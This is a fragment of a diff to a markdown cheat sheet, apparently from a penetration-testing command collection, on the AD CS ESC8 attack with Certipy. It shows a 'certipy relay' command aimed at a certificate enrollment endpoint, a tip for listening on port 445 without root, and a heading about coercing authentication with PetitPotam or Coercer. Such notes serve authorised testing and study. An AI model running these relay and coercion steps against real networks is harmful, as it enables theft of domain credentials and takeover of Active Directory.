0xJam3z/armoury/arsenal/data/cheats/Active_directory/Certipy/ESC8.md

 certipy relay -target 'https://<IP_ADDRESS>'
 ```

-## Tip: If you get a 'permission denied' while trying to listen on port 445, you can use the command (on Linux): 'echo 0 | sudo tee /proc/sys/net/ipv4/ip_unprivileged_port_start'
+## Tip: If you get a 'permission denied' while trying to listen on port 445, you can use the command (on Linux): `echo 0 | sudo tee /proc/sys/net/ipv4/ip_unprivileged_port_start`

 ## 3. Coerce Authentication with other tool (Petitpotam, Coercer)